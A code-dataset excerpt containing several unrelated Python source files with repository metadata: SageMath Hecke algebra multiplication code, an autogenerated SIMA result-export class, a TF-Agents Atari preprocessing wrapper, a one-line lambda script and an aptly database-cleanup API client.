return ret * self.monomial( (self._zero_tuple, m[1]) )
@cached_method
def algebra_generators(self):
start = 1 if self._r == 1 else 0
return Family(list(range(start, self._n)), self.T)
def T(self, i=None):
if i is None:
return [self.T(j) for j in range(self._n)]
if i == 0:
return self.monomial( ((1,) + self._zero_tuple[1:], self._one_perm) )
s = self._Pn.simple_reflections()
return self.monomial( (self._zero_tuple, s[i]) )
@cached_method
def L(self, i=None):
if i is None:
return [self.L(j) for j in range(1, self._n+1)]
if i == 1:
if self._r == 1:
return self.from_base_ring(self._u[0])
else:
return self.T(0)
T = self.T()
return self._q**-1 * T[i-1] * self.L(i-1) * T[i-1]
@cached_method
def product_on_basis(self, m1, m2):
# We represent T_i for i > 0 as S_i in comments to avoid confusion.
# Product is of the form t1*s1 * t2*s2: separate the T's and permutations.
t1, s1 = m1
t2, s2 = m2
one = self.base_ring().one()
q = self._q
qm1 = q - one
if s1 == self._one_perm:
if t1 == self._zero_tuple:
return self._from_dict({m2: one}, remove_zeros=False)
if t2 == self._zero_tuple:
return self._from_dict({(t1, s2): one}, remove_zeros=False)
k1 = max(k for k,a in enumerate(t1) if a != 0)
k2 = min(k for k,a in enumerate(t2) if a != 0)
if k1 < k2:
T = list(t1)
for k in range(k2, len(t2)):
T[k] = t2[k]
return self._from_dict({(tuple(T), s2): one}, remove_zeros=False)
M = self._product_TT(k1, t1[k1], k2, t2[k2])
t1 = list(t1)
t2 = list(t2)
t1[k1] = 0
t2[k2] = 0
L = self._from_dict({(tuple(t1), self._one_perm): one}, remove_zeros=False)
R = self._from_dict({(tuple(t2), s2): one}, remove_zeros=False)
return L * M * R
tprod = [( [(k, a) for k, a in enumerate(t2) if a != 0], {s2: one} )]
# s1 through t2
for i in reversed(s1.reduced_word()):
new_t = []
for index in range(len(tprod)):
j = i
T, sprod = tprod[index]
absorbed = False
for ind in range(len(T)):
k, a = T[ind]
# -1 from i since k is 0-based but i is 1-based
if j < k:
j += 1
elif j == k:
absorbed = True
# Quadratic relation: S_k^2 = (q - 1) S_k + q
# So S_{k-1} T_{k,a} = (q-1) T_{k,a} + q T_{k-1,a}
# Make a copy of T since we need to mutate it
new_t.append((list(T), {s: q * sprod[s] for s in sprod}))
new_t[-1][0][ind] = (k-1, a)
for s in sprod:
sprod[s] *= qm1
break
elif j == k + 1:
absorbed = True
T[ind] = (k+1, a)
break
# elif j > k: pass
if absorbed:
# We do not need to update tprod[index] because we
# have mutated that pair of objects (T, sprod).
continue
# Do the usual Hecke product of S_j * S
temp = {} # start from 0
for p in sprod:
c = sprod[p]
# We have to flip the side due to Sage's convention for multiplying permutations
pj = p.apply_simple_reflection(j, side="left")
if p.has_descent(j, side="left"):
iaxpy(1, {p: c * qm1, pj: c * self._q}, temp)
else:
iaxpy(1, {pj: c}, temp)
tprod[index] = (T, temp)
tprod.extend(new_t)
def compute(T, sprod):
if not T:
return self._from_dict({(t1, s): sprod[s] for s in sprod},
remove_zeros=False, coerce=False)
s_elt = self._from_dict({(self._zero_tuple, s): sprod[s] for s in sprod},
remove_zeros=False, coerce=False)
cur = list(t1)
product = [cur]
if t1 != self._zero_tuple:
K = max(k for k, a in enumerate(t1) if a != 0)
else:
K = -1
T.reverse()
while T:
k, a = T.pop()
if k > K:
cur[k] = a
else:
cur = list(self._zero_tuple)
cur[k] = a
product.append(cur)
K = k
return self.prod(self._from_dict({(tuple(p), self._one_perm): one},
remove_zeros=False, coerce=False)
for p in product) * s_elt
return self.sum(compute(T, sprod) for T, sprod in tprod)
@lazy_attribute
def _T0_polynomial(self):
z = PolynomialRing(self.base_ring(), 'DUMMY').gen()
return -prod(z - val for val in self._u).truncate(self._r)
def _reduced_T0_power(self, exp):
if exp < self._r:
return self.base_ring().one()
PR = self._T0_polynomial.parent()
z = PR.gen()
cur = z ** exp
while cur.degree() >= self._r:
cur = (PR.sum(coeff * self._T0_polynomial * z**e
for e, coeff in enumerate(cur.list()[self._r:]))
+ cur.truncate(self._r))
return cur
@cached_method
def _product_TT(self, kp, a, k, b):
one = self.base_ring().one()
if k == 0:
if a + b < self._r:
T = list(self._zero_tuple)
T[kp] = a + b
return self._from_dict({(tuple(T), self._one_perm): one},
remove_zeros=False, coerce=False)
def key(exp):
if exp > 0 or kp == 0:
T = list(self._zero_tuple)
T[kp] = exp
return (tuple(T), self._one_perm)
perm = self._Pn.one()
for j in range(1, kp+1):
perm = perm.apply_simple_reflection_left(j)
return (self._zero_tuple, perm)
p = self._reduced_T0_power(a + b)
zero = self.base_ring().zero()
return self._from_dict({key(exp): coeff
for exp, coeff in enumerate(p)
if coeff != zero},
remove_zeros=False, coerce=False)
assert kp >= k
s1 = self._Pn.simple_reflection(1)
qm1 = self._q - one
T = list(self._zero_tuple)
T[k-1] = b
T[kp] = a
ret = {(tuple(T), s1): one}
zero = self.base_ring().zero()
def T_index(exp, ind, i, indp):
T = list(self._zero_tuple)
T[ind] = exp
T[indp] = i
return tuple(T)
for i in range(1, b+1):
if a + b - i == i:
continue
if a + b - i < self._r:
T[k-1] = a + b - i
T[kp] = i
m = (tuple(T), self._one_perm)
T[k-1] = i
T[kp] = a + b - i
mp = (tuple(T), self._one_perm)
iaxpy(1, {m: qm1, mp: -qm1}, ret)
else:
p = self._reduced_T0_power(a + b - i)
temp = {(T_index(exp, k-1, i, kp), self._one_perm): qm1 * coeff
for exp, coeff in enumerate(p) if coeff != zero}
if p[0] != zero and k > 1:
perm = self._Pn.one()
for j in range(2, k+1):
perm = perm.apply_simple_reflection_left(j)
tind = T_index(0, k-1, i, kp)
temp[(tind, perm)] = temp[(tind, self._one_perm)]
del temp[(tind, self._one_perm)]
iaxpy(1, temp, ret)
temp = {(T_index(exp, kp, i, k-1), self._one_perm): -qm1 * coeff
for exp, coeff in enumerate(p) if coeff != zero}
if p[0] != zero:
# We need to add back in the permutation for the "T_{k',0}" in the reduction from T_{k',a+b-i}
perm = self._Pn.one()
for j in range(1, kp+1):
perm = perm.apply_simple_reflection_left(j)
tind = T_index(0, kp, i, k-1)
temp[(tind, perm)] = temp[(tind, self._one_perm)]
del temp[(tind, self._one_perm)]
iaxpy(1, temp, ret)
return self._from_dict(ret, remove_zeros=False)
| true
| true
|
1c4488741e7017b609ea544ddd3f3c1aae65f69f
| 3,703
|
py
|
Python
|
src/sima/simo/wasimresultexport.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/simo/wasimresultexport.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/simo/wasimresultexport.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
# This an autogenerated file
#
# Generated with WasimResultExport
from __future__ import annotations
from typing import Dict,Sequence,List
from dmt.entity import Entity
from dmt.blueprint import Blueprint
from .blueprints.wasimresultexport import WasimResultExportBlueprint
from typing import Dict
from sima.sima.moao import MOAO
from sima.sima.scriptablevalue import ScriptableValue
from sima.simo.bodyforcecomponentreference import BodyForceComponentReference
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from sima.simo.simobody import SIMOBody
class WasimResultExport(MOAO):
"""
Keyword arguments
-----------------
name : str
(default "")
description : str
(default "")
_id : str
(default "")
scriptableValues : List[ScriptableValue]
floaterBody : SIMOBody
pointForces : List[BodyForceComponentReference]
maxNumberOfWaveComponents : int
Limit the number of wave components exported to file (default 0)
"""
def __init__(self , name="", description="", _id="", maxNumberOfWaveComponents=0, **kwargs):
super().__init__(**kwargs)
self.name = name
self.description = description
self._id = _id
self.scriptableValues = list()
self.floaterBody = None
self.pointForces = list()
self.maxNumberOfWaveComponents = maxNumberOfWaveComponents
for key, value in kwargs.items():
if not isinstance(value, Dict):
setattr(self, key, value)
@property
def blueprint(self) -> Blueprint:
"""Return blueprint that this entity represents"""
return WasimResultExportBlueprint()
@property
def name(self) -> str:
""""""
return self.__name
@name.setter
def name(self, value: str):
"""Set name"""
self.__name = str(value)
@property
def description(self) -> str:
""""""
return self.__description
@description.setter
def description(self, value: str):
"""Set description"""
self.__description = str(value)
@property
def _id(self) -> str:
""""""
return self.___id
@_id.setter
def _id(self, value: str):
"""Set _id"""
self.___id = str(value)
@property
def scriptableValues(self) -> List[ScriptableValue]:
""""""
return self.__scriptableValues
@scriptableValues.setter
def scriptableValues(self, value: List[ScriptableValue]):
"""Set scriptableValues"""
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__scriptableValues = value
@property
def floaterBody(self) -> SIMOBody:
""""""
return self.__floaterBody
@floaterBody.setter
def floaterBody(self, value: SIMOBody):
"""Set floaterBody"""
self.__floaterBody = value
@property
def pointForces(self) -> List[BodyForceComponentReference]:
""""""
return self.__pointForces
@pointForces.setter
def pointForces(self, value: List[BodyForceComponentReference]):
"""Set pointForces"""
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__pointForces = value
@property
def maxNumberOfWaveComponents(self) -> int:
"""Limit the number of wave components exported to file"""
return self.__maxNumberOfWaveComponents
@maxNumberOfWaveComponents.setter
def maxNumberOfWaveComponents(self, value: int):
"""Set maxNumberOfWaveComponents"""
self.__maxNumberOfWaveComponents = int(value)
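# A minimal standalone sketch (not from this module) of the validated-setter
# pattern the generated properties above follow; Holder and items are
# illustrative names.
from typing import Sequence

class Holder:
    def __init__(self):
        self.items = []  # routed through the validating setter below

    @property
    def items(self):
        return self.__items

    @items.setter
    def items(self, value):
        # same Sequence guard as the generated setters above
        if not isinstance(value, Sequence):
            raise TypeError("Expected sequence, but was {}".format(type(value)))
        self.__items = value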
| 29.15748
| 96
| 0.649473
|
from __future__ import annotations
from typing import Dict,Sequence,List
from dmt.entity import Entity
from dmt.blueprint import Blueprint
from .blueprints.wasimresultexport import WasimResultExportBlueprint
from typing import Dict
from sima.sima.moao import MOAO
from sima.sima.scriptablevalue import ScriptableValue
from sima.simo.bodyforcecomponentreference import BodyForceComponentReference
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from sima.simo.simobody import SIMOBody
class WasimResultExport(MOAO):
def __init__(self , name="", description="", _id="", maxNumberOfWaveComponents=0, **kwargs):
super().__init__(**kwargs)
self.name = name
self.description = description
self._id = _id
self.scriptableValues = list()
self.floaterBody = None
self.pointForces = list()
self.maxNumberOfWaveComponents = maxNumberOfWaveComponents
for key, value in kwargs.items():
if not isinstance(value, Dict):
setattr(self, key, value)
@property
def blueprint(self) -> Blueprint:
return WasimResultExportBlueprint()
@property
def name(self) -> str:
return self.__name
@name.setter
def name(self, value: str):
self.__name = str(value)
@property
def description(self) -> str:
return self.__description
@description.setter
def description(self, value: str):
self.__description = str(value)
@property
def _id(self) -> str:
return self.___id
@_id.setter
def _id(self, value: str):
self.___id = str(value)
@property
def scriptableValues(self) -> List[ScriptableValue]:
return self.__scriptableValues
@scriptableValues.setter
def scriptableValues(self, value: List[ScriptableValue]):
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__scriptableValues = value
@property
def floaterBody(self) -> SIMOBody:
return self.__floaterBody
@floaterBody.setter
def floaterBody(self, value: SIMOBody):
self.__floaterBody = value
@property
def pointForces(self) -> List[BodyForceComponentReference]:
return self.__pointForces
@pointForces.setter
def pointForces(self, value: List[BodyForceComponentReference]):
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__pointForces = value
@property
def maxNumberOfWaveComponents(self) -> int:
return self.__maxNumberOfWaveComponents
@maxNumberOfWaveComponents.setter
def maxNumberOfWaveComponents(self, value: int):
self.__maxNumberOfWaveComponents = int(value)
| true
| true
|
1c4488e1a483c60aa43bdc2ef73a7cb25713757e
| 7,609
|
py
|
Python
|
tf_agents/environments/atari_preprocessing.py
|
wookayin/tensorflow-agents
|
ae3751dfeed52422a350227047648dd82297960b
|
[
"Apache-2.0"
] | 2
|
2018-12-20T01:49:33.000Z
|
2019-12-09T13:17:05.000Z
|
tf_agents/environments/atari_preprocessing.py
|
Akshay22121995/agents
|
1455410dffed3cfdede793b87c179965cdd27d22
|
[
"Apache-2.0"
] | null | null | null |
tf_agents/environments/atari_preprocessing.py
|
Akshay22121995/agents
|
1455410dffed3cfdede793b87c179965cdd27d22
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A class implementing minimal Atari 2600 preprocessing.
Adapted from Dopamine.
https://github.com/google/dopamine/blob/master/dopamine/atari/preprocessing.py
This includes:
. Emitting a terminal signal when losing a life (optional).
. Frame skipping and color pooling.
. Resizing the image before it is provided to the agent.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from gym.spaces.box import Box
import numpy as np
import gin.tf
import cv2
@gin.configurable
class AtariPreprocessing(object):
"""A class implementing image preprocessing for Atari 2600 agents.
Specifically, this provides the following subset from the JAIR paper
(Bellemare et al., 2013) and Nature DQN paper (Mnih et al., 2015):
* Frame skipping (defaults to 4).
* Terminal signal when a life is lost (off by default).
* Grayscale and max-pooling of the last two frames.
* Downsample the screen to a square image (defaults to 84x84).
More generally, this class follows the preprocessing guidelines set down in
Machado et al. (2018), "Revisiting the Arcade Learning Environment:
Evaluation Protocols and Open Problems for General Agents".
"""
def __init__(self,
environment,
frame_skip=4,
terminal_on_life_loss=False,
screen_size=84):
"""Constructor for an Atari 2600 preprocessor.
Args:
environment: Gym environment whose observations are preprocessed.
frame_skip: int, the frequency at which the agent experiences the game.
terminal_on_life_loss: bool, If True, the step() method returns
is_terminal=True whenever a life is lost. See Mnih et al. 2015.
screen_size: int, size of a resized Atari 2600 frame.
Raises:
ValueError: if frame_skip or screen_size are not strictly positive.
"""
if frame_skip <= 0:
raise ValueError(
'Frame skip should be strictly positive, got {}'.format(frame_skip))
if screen_size <= 0:
raise ValueError('Target screen size should be strictly positive, got {}'
.format(screen_size))
self.environment = environment
self.terminal_on_life_loss = terminal_on_life_loss
self.frame_skip = frame_skip
self.screen_size = screen_size
obs_dims = self.environment.observation_space
# Stores temporary observations used for pooling over two successive
# frames.
self.screen_buffer = [
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8),
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8)
]
self.game_over = False
self.lives = 0 # Will need to be set by reset().
@property
def observation_space(self):
# Return the observation space adjusted to match the shape of the processed
# observations.
return Box(
low=0,
high=255,
shape=(self.screen_size, self.screen_size, 1),
dtype=np.uint8)
@property
def action_space(self):
return self.environment.action_space
@property
def reward_range(self):
return self.environment.reward_range
@property
def metadata(self):
return self.environment.metadata
def reset(self):
"""Resets the environment.
Returns:
observation: numpy array, the initial observation emitted by the
environment.
"""
self.environment.reset()
self.lives = self.environment.ale.lives()
self._fetch_grayscale_observation(self.screen_buffer[0])
self.screen_buffer[1].fill(0)
return self._pool_and_resize()
def render(self, mode):
"""Renders the current screen, before preprocessing.
This calls the Gym API's render() method.
Args:
mode: Mode argument for the environment's render() method.
Valid values (str) are:
'rgb_array': returns the raw ALE image.
'human': renders to display via the Gym renderer.
Returns:
if mode='rgb_array': numpy array, the most recent screen.
if mode='human': bool, whether the rendering was successful.
"""
return self.environment.render(mode)
def step(self, action):
"""Applies the given action in the environment.
Remarks:
* If a terminal state (from life loss or episode end) is reached, this may
execute fewer than self.frame_skip steps in the environment.
* Furthermore, in this case the returned observation may not contain valid
image data and should be ignored.
Args:
action: The action to be executed.
Returns:
observation: numpy array, the observation following the action.
reward: float, the reward following the action.
is_terminal: bool, whether the environment has reached a terminal state.
This is true when a life is lost and terminal_on_life_loss, or when the
episode is over.
info: Gym API's info data structure.
"""
accumulated_reward = 0.
for time_step in range(self.frame_skip):
# We bypass the Gym observation altogether and directly fetch the
# grayscale image from the ALE. This is a little faster.
_, reward, game_over, info = self.environment.step(action)
accumulated_reward += reward
if self.terminal_on_life_loss:
new_lives = self.environment.ale.lives()
is_terminal = game_over or new_lives < self.lives
self.lives = new_lives
else:
is_terminal = game_over
if is_terminal:
break
# We max-pool over the last two frames, in grayscale.
elif time_step >= self.frame_skip - 2:
t = time_step - (self.frame_skip - 2)
self._fetch_grayscale_observation(self.screen_buffer[t])
# Pool the last two observations.
observation = self._pool_and_resize()
self.game_over = game_over
return observation, accumulated_reward, is_terminal, info
def _fetch_grayscale_observation(self, output):
"""Returns the current observation in grayscale.
The returned observation is stored in 'output'.
Args:
output: numpy array, screen buffer to hold the returned observation.
Returns:
observation: numpy array, the current observation in grayscale.
"""
self.environment.ale.getScreenGrayscale(output)
return output
def _pool_and_resize(self):
"""Transforms two frames into a Nature DQN observation.
For efficiency, the transformation is done in-place in self.screen_buffer.
Returns:
transformed_screen: numpy array, pooled, resized screen.
"""
# Pool if there are enough screens to do so.
if self.frame_skip > 1:
np.maximum(
self.screen_buffer[0],
self.screen_buffer[1],
out=self.screen_buffer[0])
transformed_image = cv2.resize(
self.screen_buffer[0], (self.screen_size, self.screen_size),
interpolation=cv2.INTER_AREA)
int_image = np.asarray(transformed_image, dtype=np.uint8)
return np.expand_dims(int_image, axis=2)
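# A hedged usage sketch (not part of the original module): assumes gym with
# the Atari dependencies installed; the environment id is illustrative.
import gym

env = AtariPreprocessing(gym.make('PongNoFrameskip-v4'))
frame = env.reset()  # (84, 84, 1) uint8 grayscale observation
frame, reward, is_terminal, info = env.step(env.action_space.sample())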
| 32.939394
| 80
| 0.697858
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from gym.spaces.box import Box
import numpy as np
import gin.tf
import cv2
@gin.configurable
class AtariPreprocessing(object):
def __init__(self,
environment,
frame_skip=4,
terminal_on_life_loss=False,
screen_size=84):
if frame_skip <= 0:
raise ValueError(
'Frame skip should be strictly positive, got {}'.format(frame_skip))
if screen_size <= 0:
raise ValueError('Target screen size should be strictly positive, got {}'
.format(screen_size))
self.environment = environment
self.terminal_on_life_loss = terminal_on_life_loss
self.frame_skip = frame_skip
self.screen_size = screen_size
obs_dims = self.environment.observation_space
self.screen_buffer = [
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8),
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8)
]
self.game_over = False
self.lives = 0
@property
def observation_space(self):
return Box(
low=0,
high=255,
shape=(self.screen_size, self.screen_size, 1),
dtype=np.uint8)
@property
def action_space(self):
return self.environment.action_space
@property
def reward_range(self):
return self.environment.reward_range
@property
def metadata(self):
return self.environment.metadata
def reset(self):
self.environment.reset()
self.lives = self.environment.ale.lives()
self._fetch_grayscale_observation(self.screen_buffer[0])
self.screen_buffer[1].fill(0)
return self._pool_and_resize()
def render(self, mode):
return self.environment.render(mode)
def step(self, action):
accumulated_reward = 0.
for time_step in range(self.frame_skip):
_, reward, game_over, info = self.environment.step(action)
accumulated_reward += reward
if self.terminal_on_life_loss:
new_lives = self.environment.ale.lives()
is_terminal = game_over or new_lives < self.lives
self.lives = new_lives
else:
is_terminal = game_over
if is_terminal:
break
elif time_step >= self.frame_skip - 2:
t = time_step - (self.frame_skip - 2)
self._fetch_grayscale_observation(self.screen_buffer[t])
observation = self._pool_and_resize()
self.game_over = game_over
return observation, accumulated_reward, is_terminal, info
def _fetch_grayscale_observation(self, output):
self.environment.ale.getScreenGrayscale(output)
return output
def _pool_and_resize(self):
if self.frame_skip > 1:
np.maximum(
self.screen_buffer[0],
self.screen_buffer[1],
out=self.screen_buffer[0])
transformed_image = cv2.resize(
self.screen_buffer[0], (self.screen_size, self.screen_size),
interpolation=cv2.INTER_AREA)
int_image = np.asarray(transformed_image, dtype=np.uint8)
return np.expand_dims(int_image, axis=2)
| true
| true
|
1c448ad0afaccfbc61915a4250834d2e0132d2f5
| 38
|
py
|
Python
|
complute.py
|
liukuan127/HelloGitHub
|
54802e44e3feae5d292d9b68817ce4d9107d214a
|
[
"Apache-2.0"
] | null | null | null |
complute.py
|
liukuan127/HelloGitHub
|
54802e44e3feae5d292d9b68817ce4d9107d214a
|
[
"Apache-2.0"
] | null | null | null |
complute.py
|
liukuan127/HelloGitHub
|
54802e44e3feae5d292d9b68817ce4d9107d214a
|
[
"Apache-2.0"
] | null | null | null |
add = lambda a,b:a+b
print(add(2,5))
| 9.5
| 20
| 0.605263
|
add = lambda a,b:a+b
print(add(2,5))
| true
| true
|
1c448b851bdb5f9d335383f735e2b275471ee8fb
| 521
|
py
|
Python
|
aptly_api/parts/db.py
|
masselstine/aptly-api-client
|
dc8034a2b624b42f54d2e55ce2ad90e2fe165a33
|
[
"BSD-3-Clause"
] | null | null | null |
aptly_api/parts/db.py
|
masselstine/aptly-api-client
|
dc8034a2b624b42f54d2e55ce2ad90e2fe165a33
|
[
"BSD-3-Clause"
] | null | null | null |
aptly_api/parts/db.py
|
masselstine/aptly-api-client
|
dc8034a2b624b42f54d2e55ce2ad90e2fe165a33
|
[
"BSD-3-Clause"
] | null | null | null |
# -* encoding: utf-8 *-
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from typing import cast
from aptly_api.base import BaseAPIClient
from aptly_api.parts.tasks import TaskAPISection, Task
class DbAPISection(BaseAPIClient):
def cleanup(self) -> Task:
resp = self.do_post("api/db/cleanup")
return TaskAPISection.task_from_response(resp.json())
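# A hedged usage sketch (not part of this file): assumes the
# aptly-api-client ``Client`` wrapper and an aptly API server reachable at
# the given URL.
from aptly_api import Client

client = Client(aptly_server_url="http://127.0.0.1:8080")
task = client.db.cleanup()  # POST api/db/cleanup, returns the queued Task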
| 32.5625
| 69
| 0.731286
|
from typing import cast
from aptly_api.base import BaseAPIClient
from aptly_api.parts.tasks import TaskAPISection, Task
class DbAPISection(BaseAPIClient):
def cleanup(self) -> Task:
resp = self.do_post("api/db/cleanup")
return TaskAPISection.task_from_response(resp.json())
| true
| true
|